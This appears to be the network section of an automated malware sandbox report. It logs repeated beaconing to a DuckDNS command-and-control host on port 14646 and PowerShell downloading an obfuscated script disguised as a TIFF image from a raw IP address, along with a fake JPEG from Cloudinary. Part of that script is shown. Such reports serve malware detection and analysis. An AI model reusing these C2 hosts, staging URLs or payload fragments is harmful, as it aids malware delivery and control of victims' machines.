                                                                                                                    Dec 13, 2024 07:41:46.136718988 CET5004714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:46.256668091 CET1464650047107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:46.256757975 CET5004714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:46.261832952 CET5004714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:46.381602049 CET1464650047107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:48.217274904 CET1464650047107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:48.217483044 CET5004714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:48.220004082 CET5004714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:48.339734077 CET1464650047107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:48.620745897 CET5004814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:48.740564108 CET1464650048107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:48.743779898 CET5004814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:48.748740911 CET5004814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:48.869868994 CET1464650048107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:50.686110973 CET1464650048107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:50.687439919 CET5004814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:50.687495947 CET5004814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:50.807372093 CET1464650048107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:51.089553118 CET5004914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:51.209892988 CET1464650049107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:51.210026979 CET5004914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:51.213255882 CET5004914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:51.333086967 CET1464650049107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:53.138235092 CET1464650049107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:53.138304949 CET5004914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:53.138346910 CET5004914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:53.258121967 CET1464650049107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:53.527581930 CET5005014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:53.647505045 CET1464650050107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:53.647593975 CET5005014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:53.651429892 CET5005014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:53.771269083 CET1464650050107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:55.591486931 CET1464650050107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:55.591617107 CET5005014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:55.591660976 CET5005014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:55.711456060 CET1464650050107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:55.964302063 CET5005114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:56.084218025 CET1464650051107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:56.084363937 CET5005114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:56.087426901 CET5005114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:56.207216978 CET1464650051107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:58.054640055 CET1464650051107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:58.057646990 CET5005114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:58.057727098 CET5005114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:58.177714109 CET1464650051107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:58.774450064 CET5005214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:58.894385099 CET1464650052107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:58.898336887 CET5005214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:58.900665045 CET5005214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:41:59.020596027 CET1464650052107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:00.826026917 CET1464650052107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:00.828623056 CET5005214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:00.828670025 CET5005214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:00.949013948 CET1464650052107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:01.183202982 CET5005314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:01.303559065 CET1464650053107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:01.304661036 CET5005314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:01.308254957 CET5005314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:01.428359985 CET1464650053107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:03.248080969 CET1464650053107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:03.248162985 CET5005314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:03.248194933 CET5005314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:03.367949963 CET1464650053107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:03.589389086 CET5005414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:03.709544897 CET1464650054107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:03.709765911 CET5005414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:03.713136911 CET5005414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:03.833190918 CET1464650054107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:05.655410051 CET1464650054107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:05.655494928 CET5005414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:05.655566931 CET5005414646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:05.775855064 CET1464650054107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:05.980487108 CET5005514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:06.100716114 CET1464650055107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:06.100831985 CET5005514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:06.103779078 CET5005514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:06.227410078 CET1464650055107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:08.045093060 CET1464650055107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:08.045202017 CET5005514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:08.045253992 CET5005514646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:08.165208101 CET1464650055107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:08.355669022 CET5005714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:08.475868940 CET1464650057107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:08.475994110 CET5005714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:08.479403019 CET5005714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:08.599423885 CET1464650057107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:10.421273947 CET1464650057107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:10.421554089 CET5005714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:10.435905933 CET5005714646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:10.555893898 CET1464650057107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:10.770919085 CET5005814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:10.891058922 CET1464650058107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:10.891156912 CET5005814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:10.894469023 CET5005814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:11.014692068 CET1464650058107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:12.827734947 CET1464650058107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:12.828519106 CET5005814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:12.830444098 CET5005814646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:12.950450897 CET1464650058107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:13.120668888 CET5005914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:13.241342068 CET1464650059107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:13.241580963 CET5005914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:13.244570971 CET5005914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:13.365168095 CET1464650059107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:15.191626072 CET1464650059107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:15.191735983 CET5005914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:15.191827059 CET5005914646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:15.312072992 CET1464650059107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:15.480000973 CET5006014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:15.602108002 CET1464650060107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:15.602225065 CET5006014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:15.605756044 CET5006014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:15.726283073 CET1464650060107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:17.545963049 CET1464650060107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:17.546058893 CET5006014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:17.546103954 CET5006014646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:17.666310072 CET1464650060107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:17.823847055 CET5006114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:17.943770885 CET1464650061107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:17.943869114 CET5006114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:17.948187113 CET5006114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:18.068137884 CET1464650061107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:19.874264956 CET1464650061107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:19.874365091 CET5006114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:19.883943081 CET5006114646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:20.003779888 CET1464650061107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:20.256083965 CET5006214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:20.376173019 CET1464650062107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:20.376252890 CET5006214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:20.381109953 CET5006214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:20.501859903 CET1464650062107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:22.311111927 CET1464650062107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:22.311362028 CET5006214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:22.311362982 CET5006214646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:22.431740999 CET1464650062107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:22.573801994 CET5006314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:22.694093943 CET1464650063107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:22.694289923 CET5006314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:23.210550070 CET5006314646192.168.2.6107.173.143.10
                                                                                                                    Dec 13, 2024 07:42:23.330738068 CET1464650063107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:24.639146090 CET1464650063107.173.143.10192.168.2.6
                                                                                                                    Dec 13, 2024 07:42:24.639244080 CET5006314646192.168.2.6107.173.143.10
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Dec 13, 2024 07:38:31.347354889 CET6284453192.168.2.61.1.1.1
                                                                                                                    Dec 13, 2024 07:38:31.484358072 CET53628441.1.1.1192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:51.825297117 CET6533453192.168.2.61.1.1.1
                                                                                                                    Dec 13, 2024 07:38:51.963633060 CET53653341.1.1.1192.168.2.6
                                                                                                                    Dec 13, 2024 07:38:55.092498064 CET6186253192.168.2.61.1.1.1
                                                                                                                    Dec 13, 2024 07:38:55.407963991 CET53618621.1.1.1192.168.2.6
                                                                                                                    Dec 13, 2024 07:39:57.060942888 CET5953453192.168.2.61.1.1.1
                                                                                                                    Dec 13, 2024 07:39:57.390291929 CET53595341.1.1.1192.168.2.6
                                                                                                                    Dec 13, 2024 07:40:58.214349031 CET5350453192.168.2.61.1.1.1
                                                                                                                    Dec 13, 2024 07:40:58.521595955 CET53535041.1.1.1192.168.2.6
                                                                                                                    Dec 13, 2024 07:41:58.417367935 CET5292553192.168.2.61.1.1.1
                                                                                                                    Dec 13, 2024 07:41:58.771136045 CET53529251.1.1.1192.168.2.6
                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Dec 13, 2024 07:38:31.347354889 CET192.168.2.61.1.1.10x35a0Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                                                    Dec 13, 2024 07:38:51.825297117 CET192.168.2.61.1.1.10xc2f7Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                                    Dec 13, 2024 07:38:55.092498064 CET192.168.2.61.1.1.10x89c1Standard query (0)newglobalfucntioninside.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                    Dec 13, 2024 07:39:57.060942888 CET192.168.2.61.1.1.10x73eStandard query (0)newglobalfucntioninside.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                    Dec 13, 2024 07:40:58.214349031 CET192.168.2.61.1.1.10xf3b2Standard query (0)newglobalfucntioninside.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                    Dec 13, 2024 07:41:58.417367935 CET192.168.2.61.1.1.10x19f9Standard query (0)newglobalfucntioninside.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Dec 13, 2024 07:38:31.484358072 CET1.1.1.1192.168.2.60x35a0No error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Dec 13, 2024 07:38:31.484358072 CET1.1.1.1192.168.2.60x35a0No error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                                                                    Dec 13, 2024 07:38:31.484358072 CET1.1.1.1192.168.2.60x35a0No error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                                                                    Dec 13, 2024 07:38:31.484358072 CET1.1.1.1192.168.2.60x35a0No error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false
                                                                                                                    Dec 13, 2024 07:38:31.484358072 CET1.1.1.1192.168.2.60x35a0No error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                                                                    Dec 13, 2024 07:38:51.963633060 CET1.1.1.1192.168.2.60xc2f7No error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                                                                                                    Dec 13, 2024 07:38:51.963633060 CET1.1.1.1192.168.2.60xc2f7No error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                                                                                                    Dec 13, 2024 07:38:55.407963991 CET1.1.1.1192.168.2.60x89c1No error (0)newglobalfucntioninside.duckdns.org107.173.143.10A (IP address)IN (0x0001)false
                                                                                                                    Dec 13, 2024 07:39:57.390291929 CET1.1.1.1192.168.2.60x73eNo error (0)newglobalfucntioninside.duckdns.org107.173.143.10A (IP address)IN (0x0001)false
                                                                                                                    Dec 13, 2024 07:40:58.521595955 CET1.1.1.1192.168.2.60xf3b2No error (0)newglobalfucntioninside.duckdns.org107.173.143.10A (IP address)IN (0x0001)false
                                                                                                                    Dec 13, 2024 07:41:58.771136045 CET1.1.1.1192.168.2.60x19f9No error (0)newglobalfucntioninside.duckdns.org107.173.143.10A (IP address)IN (0x0001)false
                                                                                                                    • res.cloudinary.com
                                                                                                                    • paste.ee
                                                                                                                    • 192.210.150.24
                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.649708192.210.150.24801488C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 13, 2024 07:38:25.283585072 CET332OUTGET /55/creamykissinglipsgoodforcreamythingswithcreamicream.tIF HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                    Host: 192.210.150.24
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Dec 13, 2024 07:38:26.393687010 CET1236INHTTP/1.1 200 OK
                                                                                                                    Date: Fri, 13 Dec 2024 06:38:26 GMT
                                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                                    Last-Modified: Thu, 12 Dec 2024 05:24:00 GMT
                                                                                                                    ETag: "25930-6290bebf04a4e"
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Content-Length: 153904
                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: image/tiff
                                                                                                                    Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 57 00 4f 00 69 00 4b 00 74 00 47 00 43 00 65 00 4b 00 75 00 68 00 49 00 6b 00 69 00 41 00 20 00 3d 00 20 00 22 00 64 00 52 00 71 00 6e 00 64 00 72 00 57 00 6f 00 61 00 57 00 69 00 57 00 4b 00 7a 00 4f 00 22 00 0d 00 0a 00 50 00 78 00 6b 00 6d 00 68 00 41 00 73 00 42 00 74 00 4b 00 57 00 4b 00 49 00 4c 00 68 00 20 00 3d 00 20 00 22 00 4c 00 6b 00 68 00 65 00 49 00 51 00 55 00 57 00 57 00 41 00 65 00 51 00 7a 00 55 00 4b 00 22 00 0d 00 0a 00 63 00 41 00 4f 00 6b 00 4b 00 6a 00 78 00 6d 00 4c 00 4b 00 6d 00 6b 00 47 00 63 00 54 00 20 00 3d 00 20 00 22 00 65 00 5a 00 47 00 4b 00 55 00 6d 00 47 00 71 00 55 00 43 00 69 00 47 00 4b 00 61 00 69 00 22 00 0d 00 0a 00 0d 00 0a 00 69 00 4b 00 47 00 62 00 6a 00 66 00 53 00 70 00 5a 00 4c 00 57 00 4a 00 6a 00 70 00 6d 00 20 00 3d 00 20 00 22 00 47 00 63 00 61 00 57 00 4b 00 75 00 62 00 67 00 67 00 6e 00 47 00 4c 00 43 00 50 00 70 00 22 00 0d 00 0a 00 4f 00 73 00 66 00 4c 00 69 00 69 00 57 00 49 00 4c 00 75 00 [TRUNCATED]
                                                                                                                    Data Ascii: WOiKtGCeKuhIkiA = "dRqndrWoaWiWKzO"PxkmhAsBtKWKILh = "LkheIQUWWAeQzUK"cAOkKjxmLKmkGcT = "eZGKUmGqUCiGKai"iKGbjfSpZLWJjpm = "GcaWKubggnGLCPp"OsfLiiWILuKcnkS = "UAcpidikKJWhhWm"efKqpiLfhKLAhcP = "mzWUhWZzotpBOWK"eIfeqoLBNZKNbdG = "JPWaGqCAGNHhpZk"kAxgnbiLnzGRcvS = "oBWCZNuGhpzcfHc"GkUzbLBfQzNpfLL = "bOiNpLUAhuKfGbc"WpeeijJiNLCakaG = "WqLpUPaiWKjWdNi"UaKrKWipOZxooBs = "zWAcLUrmzILemOU"GkPNGfzzaitOiLn = "qrLAkWUbLgbaiLG"ABjTfj
                                                                                                                    Dec 13, 2024 07:38:26.393726110 CET1236INData Raw: 00 43 00 50 00 57 00 6c 00 68 00 75 00 73 00 61 00 55 00 20 00 3d 00 20 00 22 00 57 00 4c 00 50 00 62 00 55 00 68 00 4b 00 4b 00 69 00 4e 00 53 00 4c 00 41 00 55 00 48 00 22 00 0d 00 0a 00 6d 00 47 00 65 00 4b 00 66 00 64 00 74 00 64 00 48 00 63
                                                                                                                    Data Ascii: CPWlhusaU = "WLPbUhKKiNSLAUH"mGeKfdtdHcfzbnG = "LnLQofWPbmGjnKW"cTvmquGeCqdNKiW = "NeepLIoZqLUgpSR"ubRsJGsixWiesW
                                                                                                                    Dec 13, 2024 07:38:26.393735886 CET1236INData Raw: 00 54 00 53 00 69 00 41 00 42 00 4e 00 22 00 0d 00 0a 00 50 00 7a 00 71 00 55 00 6e 00 55 00 61 00 4c 00 78 00 50 00 70 00 4b 00 6f 00 50 00 52 00 20 00 3d 00 20 00 22 00 69 00 43 00 50 00 6e 00 6b 00 43 00 70 00 75 00 62 00 65 00 6e 00 61 00 49
                                                                                                                    Data Ascii: TSiABN"PzqUnUaLxPpKoPR = "iCPnkCpubenaIaG"jUUerzcgjzpZITx = "AkPWxdeTWipocpc"SLOCfoZCWnicPPe = "PZKamBWLBLAOmhh"G
                                                                                                                    Dec 13, 2024 07:38:26.393851995 CET672INData Raw: 00 57 00 70 00 20 00 3d 00 20 00 22 00 61 00 74 00 63 00 57 00 61 00 62 00 66 00 41 00 6c 00 55 00 68 00 71 00 4c 00 74 00 57 00 22 00 0d 00 0a 00 6b 00 5a 00 41 00 62 00 5a 00 7a 00 66 00 73 00 62 00 4e 00 4c 00 4c 00 57 00 71 00 7a 00 20 00 3d
                                                                                                                    Data Ascii: Wp = "atcWabfAlUhqLtW"kZAbZzfsbNLLWqz = "eNCooLSUPTNnKKo"cGinobzkkWGzfLc = "bWJWiaUNLaCUcWd"zlLCcLccNJPcRoC = "uqAP
                                                                                                                    Dec 13, 2024 07:38:26.393862963 CET1236INData Raw: 00 54 00 20 00 3d 00 20 00 22 00 5a 00 4e 00 6f 00 6e 00 4e 00 6f 00 78 00 6b 00 66 00 42 00 71 00 70 00 66 00 51 00 47 00 22 00 0d 00 0a 00 4e 00 52 00 78 00 47 00 57 00 41 00 62 00 66 00 4c 00 50 00 71 00 57 00 55 00 43 00 78 00 20 00 3d 00 20
                                                                                                                    Data Ascii: T = "ZNonNoxkfBqpfQG"NRxGWAbfLPqWUCx = "kuWmcLecqKlhCkK"LGKdKWqtxpkgLWc = "AKLdccozTutWUeR"CsLaCPPnhCckKjL = "cLiGL
                                                                                                                    Dec 13, 2024 07:38:26.393872976 CET1236INData Raw: 00 4c 00 62 00 6b 00 70 00 43 00 6c 00 69 00 75 00 4c 00 49 00 47 00 65 00 65 00 6c 00 20 00 3d 00 20 00 22 00 6f 00 4c 00 6b 00 57 00 57 00 5a 00 47 00 69 00 7a 00 6d 00 57 00 4c 00 5a 00 69 00 62 00 22 00 0d 00 0a 00 75 00 62 00 6c 00 63 00 4c
                                                                                                                    Data Ascii: LbkpCliuLIGeel = "oLkWWZGizmWLZib"ublcLRaKKGmRGhf = "mRzhOLkhmWpfaWa"RPZmiGKCOxnookf = "aeLevOmUWPWRepL"xUPLgnNoL
                                                                                                                    Dec 13, 2024 07:38:26.393883944 CET1236INData Raw: 00 57 00 74 00 62 00 67 00 64 00 4b 00 69 00 49 00 42 00 47 00 69 00 22 00 0d 00 0a 00 6b 00 4c 00 6f 00 63 00 57 00 69 00 55 00 42 00 47 00 4e 00 64 00 75 00 41 00 55 00 4e 00 20 00 3d 00 20 00 22 00 4b 00 4f 00 57 00 41 00 63 00 7a 00 55 00 43
                                                                                                                    Data Ascii: WtbgdKiIBGi"kLocWiUBGNduAUN = "KOWAczUCLgLGWkW"AmmrNAmWGGBbLid = "GIKiUfLiAkiueUL"ZWzUiqNqrzOqGkL = "qiULaWleiWLGON
                                                                                                                    Dec 13, 2024 07:38:26.393896103 CET1236INData Raw: 00 4c 00 4b 00 63 00 69 00 57 00 64 00 65 00 20 00 3d 00 20 00 22 00 75 00 4c 00 55 00 6f 00 52 00 6d 00 53 00 63 00 69 00 66 00 6b 00 53 00 67 00 72 00 74 00 22 00 0d 00 0a 00 50 00 57 00 69 00 4c 00 7a 00 6b 00 4b 00 55 00 75 00 69 00 4a 00 6b
                                                                                                                    Data Ascii: LKciWde = "uLUoRmScifkSgrt"PWiLzkKUuiJkiAW = "iifLWWbNeAxioJK"hvWOoCNfzWLWThC = "nKZKPipKSWkkAIu"euzLiBfmmeklkzG =
                                                                                                                    Dec 13, 2024 07:38:26.394057035 CET1236INData Raw: 00 70 00 41 00 22 00 0d 00 0a 00 57 00 47 00 55 00 4c 00 4a 00 6d 00 50 00 6f 00 4f 00 47 00 4c 00 5a 00 5a 00 4c 00 6e 00 20 00 3d 00 20 00 22 00 5a 00 6f 00 47 00 62 00 4a 00 61 00 4c 00 62 00 63 00 48 00 4f 00 6e 00 63 00 6d 00 57 00 22 00 0d
                                                                                                                    Data Ascii: pA"WGULJmPoOGLZZLn = "ZoGbJaLbcHOncmW"ZeotceKQBQaAWWG = "bonKKLPpCAafUkG"NhOnhWWzmfucTcL = "NijcmGTjLkLLdqm"LUe
                                                                                                                    Dec 13, 2024 07:38:26.394095898 CET1236INData Raw: 00 20 00 22 00 66 00 55 00 70 00 78 00 42 00 57 00 75 00 6e 00 4c 00 71 00 6d 00 74 00 41 00 4b 00 72 00 22 00 0d 00 0a 00 66 00 6c 00 51 00 4c 00 61 00 50 00 69 00 6c 00 76 00 68 00 47 00 6c 00 74 00 5a 00 57 00 20 00 3d 00 20 00 22 00 63 00 66
                                                                                                                    Data Ascii: "fUpxBWunLqmtAKr"flQLaPilvhGltZW = "cfdAauuPWUevrnk"LPcLzKWGbLWzLtW = "LRLWqfpcouRUbLW"rLWKNpWCBoBdNmt = "KoKpcvcL
                                                                                                                    Dec 13, 2024 07:38:26.513797998 CET1236INData Raw: 00 62 00 71 00 64 00 47 00 4c 00 78 00 4c 00 4c 00 66 00 57 00 55 00 68 00 4b 00 20 00 3d 00 20 00 22 00 61 00 4c 00 61 00 69 00 62 00 47 00 64 00 53 00 64 00 57 00 76 00 6d 00 4c 00 69 00 5a 00 22 00 0d 00 0a 00 57 00 6d 00 4c 00 55 00 4c 00 43
                                                                                                                    Data Ascii: bqdGLxLLfWUhK = "aLaibGdSdWvmLiZ"WmLULCHKWKWWnoR = "KPUGzWZUAWhdoOR"KeoUpRKWLxzCdkx = "zbbmLWWWGZPLUjd"cKbuKARHlLqN


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.649715151.101.1.1374436556C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-13 06:38:32 UTC127OUTGET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
                                                                                                                    Host: res.cloudinary.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2024-12-13 06:38:33 UTC750INHTTP/1.1 200 OK
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 2230233
                                                                                                                    Content-Type: image/jpeg
                                                                                                                    Etag: "7b9a6708dc7c92995f443d0b41dbc8d0"
                                                                                                                    Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT
                                                                                                                    Date: Fri, 13 Dec 2024 06:38:33 GMT
                                                                                                                    Strict-Transport-Security: max-age=604800
                                                                                                                    Cache-Control: public, no-transform, immutable, max-age=2592000
